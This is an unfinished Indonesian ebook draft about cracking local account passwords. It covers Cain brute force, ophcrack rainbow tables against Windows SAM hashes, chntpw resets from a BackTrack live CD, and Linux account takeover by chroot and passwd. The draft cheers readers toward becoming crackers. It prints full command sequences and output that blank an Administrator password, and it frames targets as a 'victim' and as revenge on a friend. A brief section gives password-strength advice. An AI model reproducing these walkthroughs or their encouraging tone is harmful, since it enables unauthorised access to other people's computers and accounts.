buku kuroro yg belum juga selesai2

56
1 Tentang buku Buku ini akan memperlihatkan kepada anda, betapa cracking itu dapat sangat mudah dilakukan. Penulis buku ini, saya sendiri bukanlah praktisì keamanan apalagi seorang hacker. Di bagian 'tentang penulis' telah dijelaskan penulis kelahiran 1991 dan merupakan lulusan SMAK (sekolah menengah analis kimia) terkenal di Bogor. Yang kita butuhkan untuk menjadi cracker hanya sebuah niat untuk belajar sepenuh hati, komputer, dan buku ini tentunya. Pada buku ini juga akan dibahas penggunaan mesin virtual sebagai alat bantu pada beberapa kasus cracking. Mesin virtual akan sangat membantu karena kita akan melakukan cracking pada beberapa OS (Operating System) dan antar OS. Pada tiap materi yang dibahas, disematkan screenshoot untuk mempermudah anda dalam mencerap setiap materi. Juga disertakan video tutorial jika anda masih merasa kurang jelas dengan bahasa saya. Ingat! Anak kelas 5 SD juga dapat menerapkan teknik yang akan saya bahas. Saya harap buku ini dapat memberikan manfaat maksimal pada pembaca, minimal akan membuka mata kita lebih lebar tentang keamanan menggunakan teknologi karena teknologi berkembang sangat cepat dan kita tidak ingin hanya menjadi

Upload: ahmadi-nasution

Post on 01-Nov-2014

350 views

Category:

Education


0 download

DESCRIPTION

a few things about cracking password and etc..

TRANSCRIPT

Page 1: buku kuroro yg belum juga selesai2

1

Tentang buku

Buku ini akan memperlihatkan kepada anda, betapa cracking itu dapat sangat mudah dilakukan. Penulis buku ini, saya sendiri bukanlah praktisì keamanan apalagi seorang hacker. Di bagian 'tentang penulis' telah dijelaskan penulis kelahiran 1991 dan merupakan lulusan SMAK (sekolah menengah analis kimia) terkenal di Bogor. Yang kita butuhkan untuk menjadi cracker hanya sebuah niat untuk belajar sepenuh hati, komputer, dan buku ini tentunya. Pada buku ini juga akan dibahas penggunaan mesin virtual sebagai alat bantu pada beberapa kasus cracking. Mesin virtual akan sangat membantu karena kita akan melakukan cracking pada beberapa OS (Operating System) dan antar OS.

Pada tiap materi yang dibahas, disematkan screenshoot untuk mempermudah anda dalam mencerap setiap materi. Juga disertakan video tutorial jika anda masih merasa kurang jelas dengan bahasa saya. Ingat! Anak kelas 5 SD juga dapat menerapkan teknik yang akan saya bahas.

Saya harap buku ini dapat memberikan manfaat maksimal pada pembaca, minimal akan membuka mata kita lebih lebar tentang keamanan menggunakan teknologi karena teknologi berkembang sangat cepat dan kita tidak ingin hanya menjadi

Page 2: buku kuroro yg belum juga selesai2

2

penonton apalagi menjadi korban. Bagi pembaca yang mempunyai cita-cita untuk menjadi seorang cracker handal, semoga buku ini dapat mendekatkan anda ke cita-cita mulia tersebut ^^.

Page 3: buku kuroro yg belum juga selesai2

3

Password Cracking

Kata sandi atau bahasa kerennya password merupakan kumpulan karakter atau string yang digunakan untuk memastikan anda adalah pengguna atau pemilik yang sah atas sebuah akun ataupun file terproteksi. Sebuah kata sandi dapat menjadi sangat berguna ketika anda ingin melindungi sebuah file yang sangat penting dan tidak semua orang boleh mengaksesnya, namun kata sandi dapat menjadi sangat menyebalkan ketika anda melupakannya dan ketika anda tidak mengetahuinya (berarti bukan hak anda :P) untuk itu banyak organisasi maupun perorangan yang mengembangkan program untuk membuka sebuah kata sandi rahasia dengan memanfaatkan kelemahan suatu aplikasi (bug) dan kelemahan user. Kelemahan user merupakan kunci dari proses cracking, kelemahan userlah yang akan menentukan tingkat keberhasilan seorang cracker. Anda akan sependapat dengan saya jika terus membaca buku ini. Lanjutkan!

Kecepatan dalam mencari password bergantung pada password yang digunakan dan metode enkripsi yang digunakan. Jika password dan enkripsi yang digunakan lemah, pencarian password dapat dilakukan dalam waktu kurang dari 3 menit (sumpah!) namun untuk enkripsi dan password yang kuat, maka dewi fortuna akan pergi dari sisi sang cracker atau anda sendiri.

Serangan brutal (brute force)

Metode brute force bisa dibilang adalah tehnik yang paling efektif dalam melakukan cracking password karena akan 100% berhasil. Oleh karena itu hingga hari ini brute force attack masih

Page 4: buku kuroro yg belum juga selesai2

4

menjadi momok dunia kriptografi dibawah soceng, social engineering, sebutan keren untuk tipu menipu. Kembali ke soal serangan brute force, walopun sangat efektif serangan ini bisa menjadi sangat tidak efisien, tergantung seberapa kuat password kita. Bingung?? Baiklah. Saya kasih liat demonstasi langsung.

Saya mencoba melakukan cracking NTLM password milik windows menggunakan program cain dengan metode brute force. Saya berasumsi password trdiri dari 1-7 karakter yang terdiri dari karakter lowercase, UPPERCASE, angka, dan symbol (abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/) dan hasilnya password akan terpecahkan kira-kira dalam waktu 17 hari padahal kecepatan (Key Rate) menebak dari program cain di computer saya 6.920.111 password per detik!!

Page 5: buku kuroro yg belum juga selesai2

5

Sangat tidak efisien kan?

Saya tidak menyarankan anda melakukannya.

Sekarang mari kita berandai-andai. Seandainya ada orang yang cukup malas membuat password sehingga ia membuat password sesuai tanggal lahirnya. Yuk! Kita lihat berapa waktu yang dibutuhkan untuk memecahkan password yang hanya terdiri dari angka (numeric) yaitu 0123456789

Page 6: buku kuroro yg belum juga selesai2

6

Kita hanya membutuhkan waktu kurang dari 2 detik!!

Saya juga tidak menyarankan menggunakan password seperti itu.

Serangan pintar

ophcrack LiveCD adalah aplikasi yang dibangun di atas paltform linux yaitu distro slitaz yang berfungsi untuk melakukan cracking terhadap password windows. Ophcrack bekerja

Page 7: buku kuroro yg belum juga selesai2

7

berdasarkan rainbow hash cracking sehingga ophcrack akan melakukan cracking dalam waktu yang sangat singkat. Penasaran?

Pertama kali anda harus mendownload file ISO Image Ophcrack LiveCD ( http://sourceforge.net/project/showfiles.php?group_id=133599&package_id=167699 ). Kemudian burn ISO Image Ophcrack ke dalam CD. Anda dapat menggunakan imgburn ( http://www.imgburn.com/ ) atau tools kesayangan anda lainya.

Selain menggunakan CD, dengan sedikit usaha, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan .menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp dan kemudian melakukan cracking di tempat lain tanpa perlu menunggu di komputer target dengan mencurigakan.

Page 8: buku kuroro yg belum juga selesai2

8

Page 9: buku kuroro yg belum juga selesai2

9

Menggunakan ophcrack

Tak bosan-bosan saya mengatakan "menjadi seorang cracker itu mudah, siswa SD kelas 5 juga bisa" oleh karena itu jangan hawatir dan berpikir yang rumit-rumit dahulu. Yang perlu anda lakukan untuk menggunakan jasa ophcrack yaitu:

Berserah, pasrah pada ophcrack LiveCD

Distro Linux yang satu ini memang sangat memanjakan konsumenya. Anda akan disuguhkan otomatisasi yang sangat menghemat energy anda. Selain tidak diperlukan lagi proses instalasi anda tidak perlu password admin hanya tinggal boot dan memilih partisi dari windows yang anda ingin crack, kemudian menunggu hingga ophcrack LiveCD selesai mengerjakan tugasnya. Ingat!! Sambil menunggu anda enggak bisa sambil ngopi apalagi menyempatkan diri memasak mie goreng karena ophcrack LiveCD hanya butuh waktu tak sampai 2 menit untuk menyelesaikan tugasny :P.

John sang cracker yang jasanya kita sewa di bab sebelumnya juga tercengang melihat ophcrack beraksi. Bila anda tidak percaya, mungkin screenshot berikut dapat mengubah pikiran anda.

Page 10: buku kuroro yg belum juga selesai2

10

Dapat anda lihat untuk password “doasinfinity” ophcrack LiveCD hanya membutuhkan waktu 1menit 59 detik (kurang satu detik untuk mencapai 2menit :P)

Page 11: buku kuroro yg belum juga selesai2

11

Jelasin kerja ophcrack LiveCD

Ophcrack dapat melakukan proses dengan sangat cepat karena ophcrack menggunakan tehnik precomputed hash. Tehnik ini melakukan perhitungan hash terlebih dahulu dan menyimpan nilai hash ke dalam rainbow table. Teknik ini menjadi sangat efektif karena kita tidak perlu melakukan perhitungan nilai hash lagi. Akan ada sangat banyak waktu yang kita hemat ^^. Namun tehnik yang hebat pasti mengharuskan pengorbanan (tumbal) yang berat.

Tumbal itu adalah bandwidth dan space hardisk anda karena rainbow table ini memiliki ukuran yang sangat besar. Semakin banyak data dalam tabel maka ukuran rainbow table akan

Page 12: buku kuroro yg belum juga selesai2

12

semakin besar. Sebagai bahan pertimbangan, untuk panjang password 1 sampai 7 karakter alpha-numeric (ABCDEFGHIJKLMNOPQRSTUVWXYZ) menghabiskan space lebih dari 600 Mega Byte. Anda tak perlu hawatir karena ophcrack lengkap dengan rainbow table-nya tersedia dalam buku ini ^^.

Page 13: buku kuroro yg belum juga selesai2

13

Bekerja dengan kastomisasi sendiri

Sebenarnya kita dapat melakukan beberapa konfigurasi untuk memaksimalkan kerja ophcrack LiveCD sebagai ganti jalan berserah diri pada ophcrack LiveCD. Hal ini berguna bila tiba-tiba ophcrack LiveCD tidak berjalan lancar sebagaimana saya contohkan dan juga untuk menghindari “pembodohan” yang dilakukan ophcrack LiveCD.

Pertama yang anda lakukan adalah memboot ophcrack LiveCD seperti biasa. Kemudian tutup window launch.sh yang muncul. Kemudian buka terminal dan ketik perintah “ophcrack” (tanpa tanda petik)

Page 14: buku kuroro yg belum juga selesai2

14

Langkah pertama (optional)

Langkah ini tidak wajib anda lakukan tapi dapat meningkatkan kinerja ophcrack . Setelah GUI dari ophcrack muncul anda dapat menset nomer thread pada tab "preferences" sesuai jumlah core komputer anda, untuk processor lama set angka ke 2, untuk core 2 duo set 3, dan untuk core 2 duo quad set menjadi 5.

Masih di tab preferences. Kemudian matikan serangan brute force karena kita tidak akan menggunakan tehnik “brutal” ini.

Page 15: buku kuroro yg belum juga selesai2

15

Langkah kedua (wajib)

Load hash menggunakan tombol load, anda dapat memasukan nilai hash secara manual (opsi "single hash"), dari file text hasil pwdump, fgdump dan sebagainya (opsi "PWDUMP file"), dengan mengekstrak hash dari file SAM dan SYSTEM (opsi "Encrypted SAM") atau dari filem SAM komputer secara remote (opsi "Remote SAM")

Pada kesempatan kali ini saya memilih opsi Encrypted SAM. Sebagaimana kita ketahui Windows XP menyimpan informasi tentang password di SAM (Security Accounts Manager) di direktori /WINDOWS/system32/config/sam. Oleh Karena itu anda cukup meload polder tempat file SAM berada.

Maka ophcrack akan menampilkan semua informasi user yang terkandung dalam file SAM yaitu:

Administrator, Guest, HelpAssistant, SUPPORT_388945a0, ahmadi (punyaku :D), victim. Guest, HelpAssistant dan SUPPORT_388945a0 adalah user yang secara otomatis digenerate oleh windows, saya juga tidak tahu untuk apa. Korban kita adalah user bernama “victim” yang dicurigai menyimpan file terlarang dan kita ingin memeriksanya maka kita akan meng-crack password milik victim.

Page 16: buku kuroro yg belum juga selesai2

16

Untuk mengurangi beban yang dipikul pundak ophcrack anda dapat menghapus user yang tidak ingin anda crack menggunakan tombol delete sehingga ophcrack dapat berlari kencang.

Page 17: buku kuroro yg belum juga selesai2

17

Langkah keempat Install tabel

Karena pada kasus ini kita akan mengcrack password WindowsXp maka kita install dan enable Xp free small rainbow table. Rainbow table ini telah terdapat di dalam ophcrack LveCD, jika anda ingin mendownload sendiri dan memilih table lain anda dapat mengunjungi http://www.freerainbowtables.com/ dan jangan lupa siapkan bandwidth yang cukup besar.

Page 18: buku kuroro yg belum juga selesai2

18

Langkah selanjutnya hanya meneekan tombol crack dan menonton kerja ophcrack yang sangat cepat. Password hasil cracking dapat dilihat di kolom NT Pwd.

Page 19: buku kuroro yg belum juga selesai2

19

Page 20: buku kuroro yg belum juga selesai2

20

Kesimpulan

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna saat kita lupa password dan solusi instal ulang dirasa sangat membuang waktu dan tenaga. Namun disisi lain, Ophcrack dapat juga menjadi “senjata” ampuh bagi cracker untuk membobol Windows dengan cara yang sangat mudah dan cepat. Bahkan menurut gosip yang beredar Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Oleh karena itu kita perlu mempersulit jalan para cracker agar kita enggak jadi korban melulu. Berikut ini beberapa usaha yang dapat kita lakukan untuk mengurangi resiko agar password komputer kita tidak "dibobol" dengan mudah.

1. Setting password BIOS komputer dan ubah priority boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang kuat (strong password) yaitu:Terdiri dari minimal 7-14 karakter

Mengandung huruf besar dan kecil (A-Z dan a-z)

Mengandung angka (0-9)

Mengandung symbol (!@#$%^&*()?>{}></©€)

Bukan merupakan nama anda,anak,istri,selingkuhan atau pun tanggal lahir anda. Nama artis paforit anda juga enggak boleh! Komeng misalnya. Jangan.

Bukan merupakan kata yang ada di kamus ataupun nama yang umum.

Page 21: buku kuroro yg belum juga selesai2

21

Tidak berhubungan dengan password anda yang lain. Selalu memakai password yang sama untuk berbagai hal sangat berbahaya. Bahaya.

Jika anda kesulitan dalam menerapkan sarat-sarat tersebut, anda dapat menggunakan beberapa tool sebagai password generator seperti PC Tools Password Utilities (http://www.pctools.com/mirror/passutils.exe)

Page 22: buku kuroro yg belum juga selesai2

22

Setelah anda menentukan sendiri spesifikasi password, kemudian klik “Creat Password(s)” maka anda akan mendapat password yang SANGAT SULIT DITEBAK. Anda juga dapat merubah “quantity” untuk mendapatkan beberapa password.

Anda juga dapat mengecek kekuatan password hasil kreasi anda sendiri di tab “password checker” dengan memasukkan

Page 23: buku kuroro yg belum juga selesai2

23

kata sandi anda di field “password”. Saya mencoca memasukkan password “dodol” dan ternyata menurut PC Tools Password Utilities “dodol” bukan merupakan password yang baik.

Page 24: buku kuroro yg belum juga selesai2

24

Kemudian saya memasukkan alamat blog saya “http://technoed-alchemist.co.cc” di field password.

Mengejutkan. Alamat blog saya hanya merupakan Medium Password. Mungkin karena itu blog terkenal ^^. Sepertinya PC Tools Password Utilities mengecek password kita apakah

Page 25: buku kuroro yg belum juga selesai2

25

mengandung sarat-sarat password yang kuat dan bila tidak mengandung semua sarat tersebut akan dinilai password yang lemah.

Satu lagi kehebatan PC Tools Password Utilities. PC Tools Password Utilities dapat membaca password yang tersembunyi dibalik asteriks (*)

Page 26: buku kuroro yg belum juga selesai2

26

Anda juga dapat men-generate password yang kuat secara online menggunakan jasa web tertentu seperti http://strongpasswordgenerator.com/

Bahkan anda dapat membuat password yang sangat kuat menggunakan software yang tidak ada hubungannya dengan cracking dan password, yaitu TxTrans buatan om darmal blabla (Achmad Darmal | www.friendster.com/darmal )

Berikut ini adalah penjelasan tentang TxTrans yang saya peroleh dari file readme.txt:

TxTrans merupakan tool atau program freeware yang digunakan untuk membuat tulisan ala hacker dengan cara mudah seperti "@çHmâd ÐãRmÂ1", wave mode seperti "aChMaD DaRmAl", serta case dan reverse mode seperti "LAMRAD DAMHCA"

Petunjuk Penggunaan :

SaN9AT 5€ÐéRHånA, çÚKÙP KétÍK 7ülϧÀñ ÝãNg 4KAn áñdÄ ûÞÅH PÄÐÅ t€x7ßÖ× tèxt soÚ®cE KÈMúÐÌåÑ kLïk tömßôL 7rÅN5, 5ÍLähKáÑ êK5pERÍMÊñ DÉngãN T0mÞõ1 1ÂìÑNÝà :)

(sangat sederhana, cukup ketik tulisan yang akan anda ubah pada text box “text source” kemudian klik tombol “trans”, silakan eksperimen dengan tombol lainnya :))

Page 27: buku kuroro yg belum juga selesai2

27

Dengan menggunakan sebuah password yang kuat maka anda berhasil melindungi data anda dan berhasil “mengerjai“ sang cracker. Mau bukti?? Ayo kita coba kemampuan ophcrack dalam meng-crack medium password dan strong password. Saya menggunakan kata “D0AsInFiNiTy” dan “d0Ä5íÑfìnÍ7Ý” pada pengujian kali ini. Berikut ini adalah hasil cracking:

Page 28: buku kuroro yg belum juga selesai2

28

Page 29: buku kuroro yg belum juga selesai2

29

Dapat anda lihat ophcrack dapat mengcrack “D0AsInFiNiTy” dan gagal untuk password “d0Ä5íÑfìnÍ7Ý”

password manager,

tentang encryption,

Bikin cara baca asterisk-kash cara bikin sneadboy portable

bikin tentang keepass

Page 30: buku kuroro yg belum juga selesai2

30

Menggunakan <<back|track

Seperti yang anda lihat di bab sebelumnya cracking password menggunakan metode brute-force bisa dibilang untung-untungan karena kita tidak tahu seberapa kuat password yang dibuat oleh target.

Bayangkan kalau si korban menset passwordnya pÄs5Wõ®Ð6ÚÊnIïïH!. Saya yakin serangan dictionary dan brute force akan buntu, sementara tehnik precomputed hash menggunakan ophcrack juga menghasilkan “not found”. Tapi anda tak perlu hawatir karena selain sangat jarang yang menggunakan password sesulit pÄs5Wõ®Ð6ÚÊnIïïH. Biasanya orang menggunakan password yang muda diingat. Ada solusi lain yaitu dengan mereset password sang korban. Ini solusi bila password cracking dirasa sudah tidak memungkinkan lagi suai pepatah “banyak jalan menuju password” dan jalan itu adalah chntpw buatan Petter N Hagen. Menurut Petter kalau kita enggak tahu password-nya ya ganti saja. Gitu ajah kok repot. kan udah ketahuan tuh kalo windows nyimpen password di SAM (Security Accounts Manager) /WINDOWS/system32/config/sam.

Page 31: buku kuroro yg belum juga selesai2

31

just boot your <<back|track, then open terminal.

Sambil menunggu <<back|track selesai loading saya ingin mengenalkan SAM lebih dalam karena kita telah berkutat dengan file ini tapi saya belum menjelaskanny pada anda. Saya takut buku ini menjadi membosankan, saya sendiri lebih suka peraktek daripada teori. Berikut ini saya beri kutipan dari Wikipedia:

Security Accounts Manager (SAM) adalah sebuah basis data dalam sistem operasi berbasis Windows NT yang menyimpan informasi mengenai semua akun pengguna (user account) dan kelompok pengguna (user group). Selain dimiliki oleh sistem Windows NT secara individual, basis data ini juga dimiliki oleh domain

Page 32: buku kuroro yg belum juga selesai2

32

controller dalam sebuah domain berbasis Windows NT. Basis data ini juga sering disebut sebagai SAM, Domain directory database, atau Directory Database.

Basis data SAM pun mengambil sebagian dari registry Windows NT, dan Windows NT pun mereservasikan sebuah berkas untuknya, yakni %systemroot%\System32\Config\SAM. Semua akun pengguna, dan group-nya, serta definisi mengenai informasi keamanan dalam sumber daya yang dapat digunakan secara bersama-sama seperti halnya printer dan berkas disimpan di sini.

SAM menyimpan password milik pengguna dalam format LM hash atau NTLM hash. Karena fungsi hash adalah hanya satu arah (anda tidak akan menemukan aplikasi de-hash ataupun hash2text) maka hal ini dapat meningkatkan keamanan dalam penyimpanan password. Untuk meningkatkan keamanan basis data SAM terhadap beberapa percobaan cracking password secara offline, Microsoft memperkenalkan utilitas SYSKEY dalam Windows NT 4.0 Service Pack 4 dan semua versi terbaru Windows. Berkas SAM tidak dapat dipindahkan, dihapus atau bahkan disalin selama Windows berjalan. Tapi, SAM dapat dibaca secara paksa (dump), dan menampilkan hash password-nya, yang kemudian dapat diserang dengan menggunakan serangan brute force attack.

Sebagian besar versi Windows dapat dikonfigurasikan untuk tidak menyimpan LM hash atau NTLM hash yang

Page 33: buku kuroro yg belum juga selesai2

33

valid ketika pengguna mengganti password miliknya, yang merupakan pengaturan standar dalam Windows Vista. Perlu diingat, hal ini tidak secara langsung menghapus nilai LM hash dari dalam SAM, tapi hanya mengaktifkan sebuah fungsi ekstra selama pengubahan password yang akan menyimpan sebuah nilai yang acak di dalam field LM hash di dalam SAM. Nilai yang acak tersebut tidak memiliki hubungan sama sekali dengan password milik pengguna, dan nilainya sama untuk semua pengguna.

LM hash tidak dapat dihitung ketika pengguna memiliki password dengan panjang lebih dari 14 karakter. Sehingga, ketika pengguna mengatur password dengan ukuran lebih dari 15, LM hash juga diset ke nilai acak.

Setelah booting dari CD <<back|track pertama kita cek status hardisk yang dimount oleh <<back|track

bt ~ # mount

tmpfs on / type tmpfs (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

usbfs on /proc/bus/usb type usbfs

(rw,devgid=10,devmode=0666)

Page 34: buku kuroro yg belum juga selesai2

34

/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)

/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)

/dev/sda5 on /mnt/sda5 type ntfs (ro,noatime)

kalo partisi windowsna masih read only kita akan me-mount ulang menggunakan command:

FAT mount -o rw /dev/hda# /mnt/hda#

NTFS ntfsmount /dev/hda# /mnt/hda#

untuk itu jalankan perintah:

bt ~ # umount /mnt/sda5bt ~ # ntfsmount /dev/sda5 /mnt/sda5

tmpfs on / type tmpfs (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

usbfs on /proc/bus/usb type usbfs

(rw,devgid=10,devmode=0666)

/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)

/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)

/dev/sda5 on /mnt/sda5 type fuse

(rw,nosuid,nodev,default_permissions,allow_other)

kemudian kita langsung ke TE-KA-PEee!!

bt ~ # cd /mnt/hda1/WINDOWS/system32/config

abis itu jalanin program chntpw,

oia..

Page 35: buku kuroro yg belum juga selesai2

35

jangan lupa backup dulu file SAM dan system,

buat jaga-jaga ajah,

bt config # cp SAM SAM_backup

bt config # cp system system_backup

bt config # chntpw -i SAM system SECURITY

Kira-kira previewnya seperti ini:

<>==================<> START <>==================<>

bt ~ # mount

tmpfs on / type tmpfs (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

usbfs on /proc/bus/usb type usbfs

(rw,devgid=10,devmode=0666)

/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)

/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)

/dev/sda5 on /mnt/sda5 type ntfs (ro,noatime)

bt ~ # umount /mnt/sda5

bt ~ # ntfsmount /dev/sda5 /mnt/sda5

tmpfs on / type tmpfs (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

usbfs on /proc/bus/usb type usbfs

(rw,devgid=10,devmode=0666)

/dev/sda1 on /mnt/sda1 type ntfs (ro,noatime)

/dev/sda3 on /mnt/sda3 type ext3 (rw,noatime)

/dev/sda5 on /mnt/sda5 type fuse

(rw,nosuid,nodev,default_permissions,allow_other)

Page 36: buku kuroro yg belum juga selesai2

36

bt ~ # chntpw

chntpw version 0.99.3 040818, (c) Petter N Hagen

chntpw: change password of a user in a NT SAM

file, or invoke registry editor.

chntpw [OPTIONS] <samfile> [systemfile]

[securityfile] [otherreghive] [...]

-h This message

-u <user> Username to change, Administrator is

default

-l list all users in SAM file

-i Interactive. List users (as -l) then ask for

username to change

-e Registry editor. Now with full write support!

-d Enter buffer debugger instead (hex editor),

-t Trace. Show hexdump of structs/segments.

(deprecated debug function)

-v Be a little more verbose (for debuging)

-L Write names of changed files to /tmp/changed

-N No allocation mode. Only (old style) same

length overwrites possible

See readme file on how to extract/read/write the

NT's SAM file

if it's on an NTFS partition!

Source/binary freely distributable. See

README/COPYING for details

NOTE: This program is somewhat hackish! You are on

your own!

bt ~ # cd /mnt/sda5/WINDOWS/system32/config/

bt config # ls

AppEvent.Evt SAM.LOG TempKey.LOG software.LOG

systemprofile/

Internet.evt SECURITY default software.sav

userdiff

ODiag.evt SECURITY.LOG default.LOG system

userdiff.LOG

OSession.evt SecEvent.Evt default.sav system.LOG

SAM SysEvent.Evt software system.sav

Page 37: buku kuroro yg belum juga selesai2

37

bt config #

bt config # chntpw -i SAM system SECURITY

chntpw version 0.99.3 040818, (c) Petter N Hagen

Hive's name (from header):

<\SystemRoot\System32\Config\SAM>

ROOT KEY at offset: 0x001020 * Subkey indexing

type is: 666c <lf>

File size 24576 [6000] bytes, containing 5 pages

(+ 1 headerpage)

Used for data: 249/19600 blocks/bytes, unused:

6/720 blocks/bytes.

Hive's name (from header): <SYSTEM>

ROOT KEY at offset: 0x001020 * Subkey indexing

type is: 686c <lh>

Page at 0x536000 is not 'hbin', assuming file

contains garbage at end

File size 5505024 [540000] bytes, containing 1282

pages (+ 1 headerpage)

Used for data: 104577/5395424 blocks/bytes,

unused: 2392/23520 blocks/bytes.

Hive's name (from header):

<emRoot\System32\Config\SECURITY>

ROOT KEY at offset: 0x001020 * Subkey indexing

type is: 666c <lf>

Page at 0xe000 is not 'hbin', assuming file

contains garbage at end

File size 262144 [40000] bytes, containing 13

pages (+ 1 headerpage)

Used for data: 1026/46544 blocks/bytes, unused:

8/6288 blocks/bytes.

* SAM policy limits:

Failed logins before lockout is: 0

Minimum password length : 0

Password history count : 0

Page 38: buku kuroro yg belum juga selesai2

38

<>========<> chntpw Main Interactive Menu

<>========<>

Loaded hives: <SAM> <system> <SECURITY>

1 - Edit user data and passwords

2 - Syskey status & change

3 - RecoveryConsole settings

- - -

9 - Registry editor, now with full write support!

q - Quit (you will be asked if there is something

to save)

What to do? [1] -> [ENTER]

===== chntpw Edit User Info & Passwords ====

RID: 01f4, Username: <Administrator>

RID: 01f5, Username: <Guest>, *disabled or locked*

RID: 03e8, Username: <HelpAssistant>, *disabled or

locked*

RID: 03eb, Username: <kuroro>

RID: 03ea, Username: <SUPPORT_388945a0>, *disabled

or locked*

RID: 03ed, Username: <__vmware_user__>

Select: ! - quit, . - list users, 0x<RID> - User

with RID (hex)

or simply enter the username to change:

[Administrator]

RID : 0500 [01f4]

Username: Administrator

fullname:

comment : Built-in account for administering the

computer/domain

homedir :

Page 39: buku kuroro yg belum juga selesai2

39

Account bits: 0x0210 =

[ ] Disabled | [ ] Homedir req. | [ ] Passwd not

req. |

[ ] Temp. duplicate | [X] Normal account | [ ] NMS

account |

[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv

trust act |

[X] Pwd don't expir | [ ] Auto lockout | [ ]

(unknown 0x08) |

[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ]

(unknown 0x40) |

Failed login count: 0, while max tries is: 0

Total login count: 0

** LANMAN password not set. User MAY have a blank

password.

** Usually safe to continue

* = blank the password (This may work better than

setting a new password!)

Enter nothing to leave it unchanged

Please enter new password: * [ENTER]

Blanking password!

Do you really wish to change it? (y/n) [n] y

[ENTER]Changed!

Select: ! - quit, . - list users, 0x<RID> - User

with RID (hex)

or simply enter the username to change:

[Administrator] !

<>========<> chntpw Main Interactive Menu

<>========<>

Page 40: buku kuroro yg belum juga selesai2

40

Loaded hives: <SAM> <system> <SECURITY>

1 - Edit user data and passwords

2 - Syskey status & change

3 - RecoveryConsole settings

- - -

9 - Registry editor, now with full write support!

q - Quit (you will be asked if there is something

to save)

What to do? [1] -> q [ENTER]

Hives that have changed:

# Name

0 <SAM>

Write hive files? (y/n) [n] : y [ENTER]

0 <SAM> - OK

bt config # reboot [ENTER]

<>==================<> END <>==================<>

Page 41: buku kuroro yg belum juga selesai2

41

Sekarang pasti anda telah berpikir “wah gampang banget ya ngecrack password windows”. Jika belum berusahalah untuk memikirkannya.

Suatu hari teman saya mengatakan “kalau begitu gw pake linux aja deh” setelah saya perlihatkan betapa mudahnya melakukan cracking password pada Windows. walopun masyarakat kita yang menggunakan linux masih minim, tetap saja aturan “tidak ada yang 100% aman” juga berlaku untuk linux dan kerabatnya. Bahkan dapat dikatakan cracking password linux hanya sedikit lebih sulit karena perlu menjalankan perintah-perintah yang bagi sebagian orang sangat sulit karena terbiasa menggunakan wizard di windows yang sangat memanjakan. Saatnya berubah!

Saya akan memperlihatkan pada anda di bab berikutnya cara melakukan cracking local password di Linux. Sabar.

Page 42: buku kuroro yg belum juga selesai2

42

BAB

Suatu hari anda mendapati komputer di kamar kos anda (anggap saja!) disusupi file-file porno anda sadar ketika balon peringatan windows mengatakan “low disk space blabla” dan anda mencurigai seorang teman anda yang terkenal sebagai hacker kampus yang sengaja menjadikan hardisk computer anda sebagai media untuk menyimpan file tabu tersebut. Kemudian anda berniat mengembalikan file terlarang itu ke sang hacker kampus (hawatir ia masih butuh) juga ingin balas dendam. Namun ketika anda booting komputernya yang anda dapati adalah GRUB loader dari <<back|track 4.

Dengan sedikit putus asa karena operating system yang teman anda gunakan adalah distronya para pakar keamanan (hacker) anda pulang dan jalan-jalan ke gramedia. Singkat cerita anda menemukan buku ini dan melihat salah satu judul bab “cracking local password linux”.

Pada kasus ini saya membuat skenario yang agak aneh, tapi intinya saya ingin memperlihatkan pada anda cracking password linux menggunakan <<back|track 2. Jadi kita akan mengadu <<back|track 2 VS <<back|track 4. Kakak melawan adik.

Ya. Saya memang gila.

Page 43: buku kuroro yg belum juga selesai2

43

Sperti biasa langkah pertama booting komputer dari live CD <<back|track 2. Jika pada windows informasi mengenai user dan password di simpan di file SAM (/WINDOWS/system32/config), di linux informasi user dan password disimpan di /etc/passwd dan /etc/shadow. Oleh karena itu kita "hanya" perlu memodifikasi file shadow ini untuk dapat menerobos masuk.

Pertama saya menjalan perintah cp untuk mengkopi file shadow. Tujuannya sebagai backup agar saya dapat mengembalikan file shadow seperti semula setelah saya selesai “bersenang-senang”.

bt ~ # cd /mnt/sda3/etc

bt ~ # cp shadow shadow_backup

Kemudian saya melakukan mount ulang partisi <<back|track 4 ke direktori yang kita buat di <<back|track 2. Di sini saya membuat direktori /mnt/bt4.

bt ~ # mkdir /mnt/bt4

bt ~ # umount /dev/sda3

bt ~ # mount /dev/sda3 /mnt/bt4

Page 44: buku kuroro yg belum juga selesai2

44

Kemudian kita ubah direktori root ke direktori yang tadi kita buat dengan perintah chroot new_directory [command]. Jika [command] dikosongkan maka akan diset default yaitu /bin/bash.

bt ~ # chroot /mnt/bt4

dan inilah klimaks dari alur yang kita lakukan. Berikutnya kita hanya perlu mengganti password user yang kita inginkan:

bt ~ # passwd [username korban]

Kemudian reboot computer korban dan masuk dengan password baru yang kita buat. Mudah kan??<>===============<>>> END <<<>===============<>

Page 45: buku kuroro yg belum juga selesai2

45

BONUS STAGE

Bab ini saya berikan sebagai bonus untuk anda (saya baik yah??). Di bab bonus ini saya akan menggunakan jasa john untuk melakukan cracking pada local password linux. Prosesnya hanya sedikit berbeda dengan cracking Windows di bab

Sebelumnya kita kembalikan file shadow yang tadi kita rusak (jika anda melakukan percobaan di bab sebelumnya) denga menjalankan perintah:

bt ~ # cd /mnt/sda3/etc

bt etc # mv shadow_backup shadow

